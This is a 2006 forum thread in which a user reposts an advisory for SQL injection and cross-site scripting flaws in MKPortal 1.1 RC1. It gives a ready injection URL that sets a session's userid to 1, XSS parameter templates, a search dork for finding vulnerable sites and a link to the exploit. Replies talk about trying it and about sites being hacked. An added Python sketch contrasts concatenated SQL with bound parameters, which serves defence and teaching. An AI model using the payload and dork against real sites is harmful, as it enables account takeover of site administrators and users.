Bigojey Posted July 7, 2006

I got this exploit from a friend. His name is Mustafa Can Bjorn but everybody knows him as nukedx.
PS: I don't know if this exploit was given before, so don't be angry pls if you already know this exploit.
Here's the exploit:

Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via these methods a remote attacker can inject arbitrary SQL queries into the ind parameter in index.php of MKPortal. Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37; as you can see, it is easy to bypass this SQL update function. Also there is a cross-site scripting vulnerability in pm_popup.php: the parameters u1, m1, m2, m3, m4 are not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection:
GET -> http://[victim]/[mkportaldir]/index.php?ind=
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example a remote attacker updates his session's userid to 1, and after refreshing the page he can log in as userid 1.
XSS:
GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted vendor and waiting for reply.
---
Exploit: http://www.nukedx.com/?getxpl=26
---
Dorks: "MKPortal 1.1 RC1"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=26
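
Added example, not part of the original post or the advisory: a sketch of why a session UPDATE built by string concatenation lets the `ind` value quoted above rewrite `userid`, next to the bound-parameter form that stores the same value as plain data. The MKPortal code itself is not shown on this page, so SQLite stands in for the forum database, and the table name and the `location` and `sessionhash` columns are hypothetical; only `userid` comes from the advisory.

```python
import sqlite3

# Constructed schema: only the `userid` column name comes from the advisory;
# the table name, `location` and `sessionhash` are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE session (sessionhash TEXT PRIMARY KEY, "
               "userid INTEGER, location TEXT)")
    db.execute("INSERT INTO session VALUES ('abc123', 42, '')")
    return db

def update_location_concat(db, sessionhash, ind):
    # Pattern the advisory describes: the request value is pasted into the
    # UPDATE text, so a quote in `ind` ends the string literal early.
    sql = ("UPDATE session SET location='" + ind +
           "' WHERE sessionhash='" + sessionhash + "'")
    db.execute(sql)

def update_location_bound(db, sessionhash, ind):
    # Hardened form: values travel as bound parameters, never as SQL text.
    db.execute("UPDATE session SET location=? WHERE sessionhash=?",
               (ind, sessionhash))

def session_row(db, sessionhash):
    return db.execute("SELECT userid, location FROM session "
                      "WHERE sessionhash=?", (sessionhash,)).fetchone()

def demo(update_fn, ind):
    # Fresh database per run so the two variants can be compared directly.
    db = make_db()
    update_fn(db, "abc123", ind)
    return session_row(db, "abc123")

if __name__ == "__main__":
    value = "',userid='1"  # the ind value quoted in the advisory
    print("concatenated:", demo(update_location_concat, value))
    print("bound:       ", demo(update_location_bound, value))
```

The same binding rule applies in PHP/MySQL through prepared statements; the `u1` and `m1` to `m4` values in pm_popup.php need HTML-escaping on output as a separate fix.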

Screech Posted July 7, 2006

Yeah, I found it too a while ago, and I tried it a few days ago but it didn't work for me.
-----------------------
fuck, you are not a Romanian boy, I say this: I've tried this exploit but it did not work for me

Bigojey Posted July 7, 2006 (Author)

QUOTE("Xavier"):
Yeah, I found it too a while ago, and I tried it a few days ago but it didn't work for me.
-----------------------
fuck, you are not a Romanian boy, I say this: I've tried this exploit but it did not work for me

Pls in English, German or Español. I hope it isn't such a negative sentence.

nos Posted July 7, 2006

After 2 weeks an exploit gets old. At least in my opinion, after 2 weeks all the sites of this type have been hacked......